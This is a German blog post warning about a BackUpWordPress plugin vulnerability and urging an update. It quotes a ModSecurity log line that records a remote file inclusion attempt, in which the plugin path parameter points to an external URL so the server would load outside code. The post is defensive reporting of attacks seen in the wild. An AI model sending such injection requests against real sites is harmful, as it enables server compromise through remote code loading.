Sicherheitslücke: BackUpWordPress (Update)

Aktuell gibt es eine Sicherheitslücke in BackUpWordPress und passend dazu einen Exploit (Nur für Tests verwenden). Eine gefixt Version gibt es hier und diese sollte auch schnell eingespielt werden, denn die Skript Kiddies sind wieder unterwegs. Zumindest wenn man sich die Auswertung des Logs von ModSecurity:

Request: www.blogator.de 209.216.249.194 - - [02/Nov/2007:10:57:55 +0100] "GET /plugins/BackUp/Archive.php?bkpwp_plugin_path= \ http://www.intelligent-design-forum.de/header/contr.txt%3f HTTP/1.1" 400 299 "-" "libwww-perl/5.808" - "-"

Seit gestern zähle ich 74 Zugriffe und ein Ende ist noch nicht in Sicht.

Update: Hatte mich schon gewundert warum ich heute so viel Hits hatte. 513 davon vielen auf den Versuch über die oben genannte Sicherheitslücke “Schadcode” von extern nachzuladen…

1 Star2 Stars3 Stars4 Stars5 Stars (keine Stimme)
Loading ... Loading ...

Einen Kommentar schreiben: